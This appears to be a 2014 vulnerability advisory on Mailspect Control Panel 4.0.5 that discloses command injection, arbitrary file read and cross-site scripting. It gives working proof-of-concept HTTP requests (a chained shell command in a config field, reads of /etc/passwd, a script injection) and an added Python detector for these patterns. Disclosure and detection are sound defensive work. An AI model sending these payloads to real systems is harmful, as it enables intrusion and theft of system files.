Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities

27 Jun 2014 | Reported by BGA Security | Type: exploitdb | Source: www.exploit-db.com

Mailspect Control Panel 4.0.5 Multiple Vulnerabilities including remote code execution, arbitrary file read and cross site scripting

Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

Release Date:
===========
June 21, 2014

Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched 
in 2005 as a Control Panel for open source antispam and antivirus scanning engines such as Clamd and SpamAssassin.

Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quarantine Solution and Mail Filter. Subsequently, 
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-PROT, Mailshell, and Sophos, and built-in 
content filters and reputation engines.

Abstract Advisory Information:
=======================
The BGA team discovered one remote code execution, two arbitrary file read and one cross-site scripting vulnerability in the Mailspect Control Panel 
4.0.5 web application.

Vulnerability Disclosure Timeline:
=========================
May 4, 2014  :  Contact with Vendor
May 16, 2014  :  Vendor Response
June 21, 2014  :  Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected. 

Exploitation Technique:
==================
RCE:  Remote, Authenticated
AFR:  Remote, Authenticated
XSS:  Remote, Unauthenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with the config_version_cmd parameter set to a Linux command group such as "whoami > 
/tmp/who; /usr/local/MPP/mppd -v" causes the first command to be executed once a GET request is sent to (or a browser simply visits) 
the "status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable as well.

2. Sending a GET request to "/monitor_logs_ctl.cgi" with the log_dir parameter set to "/" and the log_file parameter set to an arbitrary 
file name such as "/etc/passwd" discloses the contents of that file.

3. Sending a POST request to "/monitor_manage_logs.cgi" with the log_file parameter set to an arbitrary file name such as "/etc/passwd" 
discloses the contents of that file.

4. Sending a POST request to "/monitor_manage_logs.cgi" with the login parameter set to "></script>js to be executed<script/> leads to 
execution of the injected JavaScript code.

Proof of Concept (PoC):
==================
1. Proof of Concept RCE Request:

POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
 
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60

2. Proof of Concept AFR Request 1:

GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive 

3. Proof of Concept AFR Request 2:

POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
 
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on

4. Proof of Concept XSS Request:

GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive 
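
As an added example that is not part of the advisory or of the vendor's code, the following Python inspects raw HTTP requests of the form shown in the PoCs above and flags the three request patterns described under Technical Details, the way a reverse proxy or WAF in front of the Control Panel could. The host name mpp.example and the sample requests are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameter names come from the advisory; the checks are written
# from a reverse-proxy/WAF viewpoint, where the POST body is visible too.
LOG_ENDPOINTS = {"/monitor_logs_ctl.cgi", "/monitor_manage_logs.cgi"}
SHELL_META = re.compile(r"[;&|`$<>]")   # chaining/redirection inside a *_cmd value
XSS_MARK = re.compile("[<>\"']")        # markup characters inside a login name

def parse_raw_request(raw):
    """Split a raw HTTP/1.x request into (method, path, merged query+body params)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, vals in parse_qs(body.strip(), keep_blank_values=True).items():
        params.setdefault(key, []).extend(vals)
    return method, parts.path, params

def inspect_request(raw):
    """Return a list of findings for one request; an empty list means nothing matched."""
    method, path, params = parse_raw_request(raw)
    findings = []
    if method == "POST" and path == "/system_module.cgi":
        for key, vals in params.items():          # every *_cmd field is a command
            if key.endswith("_cmd") and any(SHELL_META.search(v) for v in vals):
                findings.append(f"command injection attempt via {key}")
    if path in LOG_ENDPOINTS:
        for v in params.get("log_file", []):      # absolute path or traversal
            if v.startswith("/") or ".." in v.split("/"):
                findings.append(f"arbitrary file read attempt: log_file={v}")
    if path == "/login.cgi":
        for v in params.get("login", []):
            if XSS_MARK.search(v):
                findings.append("reflected XSS attempt in login parameter")
    return findings

# Constructed sample requests modelled on the advisory's PoCs (not captured traffic).
RCE_REQ = ("POST /system_module.cgi HTTP/1.1\r\nHost: mpp.example:20001\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
           "post=1&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v"
           "&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s")
AFR_REQ = ("GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail HTTP/1.1\r\n"
           "Host: mpp.example:20001\r\n\r\n")
XSS_REQ = ("GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\n"
           "Host: mpp.example:20001\r\n\r\n")
OK_REQ = ("GET /monitor_logs_ctl.cgi?log_file=mppd.log&log_dir=/var/log/MPP/&mode=tail HTTP/1.1\r\n"
          "Host: mpp.example:20001\r\n\r\n")
```

Web server access logs record only the request line, so the two POST-based patterns are visible only to a component that sees the body (a reverse proxy, a WAF or the application itself); the GET-based AFR and XSS requests can also be matched from access logs.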

Solution Fix & Patch:
================
The XSS will be patched in version 4.0.7.
There will be no patch for the RCE and AFR vulnerabilities, as stated in the vendor's reply.

Security Risk:
==========
The risk of the vulnerabilities above is estimated as high.

Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
      
Domain:  www.bga.com.tr/advisories.html
Social:    twitter.com/bgasecurity
Contact:  [email protected]
  
Copyright © 2014 | BGA Security
